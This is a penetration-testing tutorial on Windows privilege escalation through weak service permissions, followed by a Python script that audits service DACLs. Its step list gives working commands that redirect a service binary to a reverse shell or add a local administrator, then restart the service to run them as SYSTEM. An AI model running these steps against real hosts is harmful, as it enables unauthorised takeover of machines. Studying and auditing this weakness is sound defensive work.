# Insecure Service Permissions

### Overview

**Insecure Service Permissions** is a local Windows privilege escalation technique where a non-privileged user has dangerous permissions over a Windows service that runs with **elevated privileges** (usually **LocalSystem**).

If an attacker can:

* **Modify the service binary**
* **Change the service configuration**
* **Start/stop the service**

they can replace or redirect the service executable to **malicious code**, causing it to run as **SYSTEM**.

Core issue: the service's **DACL** (discretionary access control list) grants one of these rights to a low-privileged principal.

### Why this Works

Windows services:

* Often run as **NT AUTHORITY\SYSTEM** and are controlled via the **Service Control Manager (SCM)**
* Have permissions defined by a **security descriptor**

If a service grants **write / change / full control** permissions to:

* `Users`
* `Authenticated Users`
* A low-privileged domain user

Then that user can hijack execution.

The most dangerous service permissions are given below:

| Permission              | Meaning            |
| ----------------------- | ------------------ |
| `SERVICE_CHANGE_CONFIG` | Change the service configuration, including its binary path |
| `SERVICE_START`         | Start service      |
| `SERVICE_STOP`          | Stop service       |
| `WRITE_DAC`             | Modify permissions |
| `WRITE_OWNER`           | Take ownership     |
| `FULL CONTROL`          | Everything         |

### Prerequisites

All of the below must be present:

* **Local Access**: Shell or RDP as a **low-privileged user**
* **Vulnerable Service**: Service runs as `LocalSystem`, `LocalService`, or another high-privileged account.
* **Ability to restart the service** (`SERVICE_STOP` and `SERVICE_START` from the table above)

### Useful commands

```bash
# cmd.exe: list services whose binary lives outside the Windows directory (WMIC is deprecated on current builds)
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"

# PowerShell equivalent
Get-CimInstance Win32_Service | Where-Object { $_.PathName -notlike 'C:\Windows*' }
```

### Steps

1. Identify vulnerable service:

   ```bash
   # Show the service configuration: the account it runs as (SERVICE_START_NAME) and BINARY_PATH_NAME
   sc qc <ServiceName>

   # Check which rights this user has on the service; look for the permissions listed above
   accesschk.exe /accepteula -vmqec <username> <serviceName>

   # PowerShell: decode the service DACL. Use sc.exe, because "sc" alone is a PowerShell alias for Set-Content.
   # ConvertFrom-SddlString prints file-system right names; bit 0x2 (WriteData) is SERVICE_CHANGE_CONFIG here.
   (sc.exe sdshow <serviceName> | ConvertFrom-SddlString).DiscretionaryAcl
   # Same thing launched from cmd.exe
   powershell.exe -c "(sc.exe sdshow <serviceName> | ConvertFrom-SddlString).DiscretionaryAcl"

   # Check the current state of the service
   sc query <serviceName>
   ```
2. Make sure a reverse shell executable is already on the machine, or upload it now (e.g. `rev.exe`).
3. Modify the service binary path (needs **SERVICE\_CHANGE\_CONFIG**):

   ```bash
   # Point the service at the reverse shell
   sc config VulnService binPath= "C:\Temp\rev.exe"

   # Add a local admin named 'user' (the service will fail to start because this is not a
   # real service binary, but the command still runs as SYSTEM)
   sc config VulnService binPath= "net localgroup administrators user /add"

   # Point the service at the reverse shell and also set the service account to LocalSystem
   # (sc.exe requires the space after "obj=")
   sc config VulnService binPath= "C:\Temp\rev.exe" obj= LocalSystem
   ```
4. Restart/start the service (needs `SERVICE_STOP` / `SERVICE_START`):

   ```bash
   sc stop VulnService
   sc start VulnService
   ```
5. Set up a listener and catch the reverse shell.
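To check a service DACL the way step 1 describes, without relying on the file-system right names that `ConvertFrom-SddlString` prints, here is an added Python audit helper (not part of this checklist) that decodes the SDDL string printed by `sc.exe sdshow` into service-specific rights and flags any allow ACE that gives a low-privileged trustee `SERVICE_CHANGE_CONFIG`, `WRITE_DAC` or `WRITE_OWNER`. The sample SDDL strings are constructed; the generic-rights mapping and the low-privileged trustee list are assumptions stated in the comments.

```python
import re

# Rights tokens as printed by "sc.exe sdshow", mapped to service access bits (winsvc.h).
# Generic rights use the service object's generic mapping, e.g. GW = READ_CONTROL|CHANGE_CONFIG.
SERVICE_RIGHTS = {
    "CC": 0x00001, "DC": 0x00002, "LC": 0x00004, "SW": 0x00008, "RP": 0x00010,
    "WP": 0x00020, "DT": 0x00040, "LO": 0x00080, "CR": 0x00100, "SD": 0x10000,
    "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
    "GR": 0x2008D, "GW": 0x20002, "GX": 0x20170, "GA": 0xF01FF,
}
# Bits that let the holder redirect the service binary or rewrite the DACL itself.
DANGEROUS = {0x2: "SERVICE_CHANGE_CONFIG", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
CONTROL = {0x10: "SERVICE_START", 0x20: "SERVICE_STOP"}
# Low-privileged trustees (assumed set): Users and Authenticated Users from the checklist,
# plus Everyone, INTERACTIVE and Domain Users, as SDDL abbreviations and well-known SIDs.
LOW_PRIV = {"BU", "AU", "WD", "IU", "DU", "S-1-5-32-545", "S-1-5-11", "S-1-1-0", "S-1-5-4"}

def decode_rights(token):
    """Turn the rights field of one ACE (letter pairs or a 0x mask) into an access mask."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    return sum(SERVICE_RIGHTS.get(token[i:i + 2], 0) for i in range(0, len(token), 2))

def audit_service_sddl(sddl):
    """Return [(trustee, [rights])] for allow ACEs that give a low-privileged trustee
    a dangerous right. Deny ACEs are not evaluated, so this errs toward over-reporting."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0] if "D:" in sddl else ""
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl):
        ace_type, _flags, rights, _obj, _inh, trustee = (ace.split(";") + [""] * 6)[:6]
        if ace_type != "A" or trustee not in LOW_PRIV:
            continue
        mask = decode_rights(rights)
        hits = [name for bit, name in DANGEROUS.items() if mask & bit]
        if hits:  # report start/stop too, since they let the holder trigger the new binary
            hits += [name for bit, name in CONTROL.items() if mask & bit]
            findings.append((trustee, hits))
    return findings

# Constructed samples: a stock default DACL, and one where Authenticated Users got full
# control and BUILTIN\Users got a hex mask equal to GENERIC_WRITE.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)(A;;0x20002;;;BU)")

if __name__ == "__main__":
    for label, sddl in (("default", DEFAULT_SDDL), ("weak", WEAK_SDDL)):
        print(label, audit_service_sddl(sddl) or "no dangerous rights for low-privileged trustees")
```

On a live host, feed it the last non-empty line of `sc.exe sdshow <serviceName>` for each service from the enumeration commands above.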

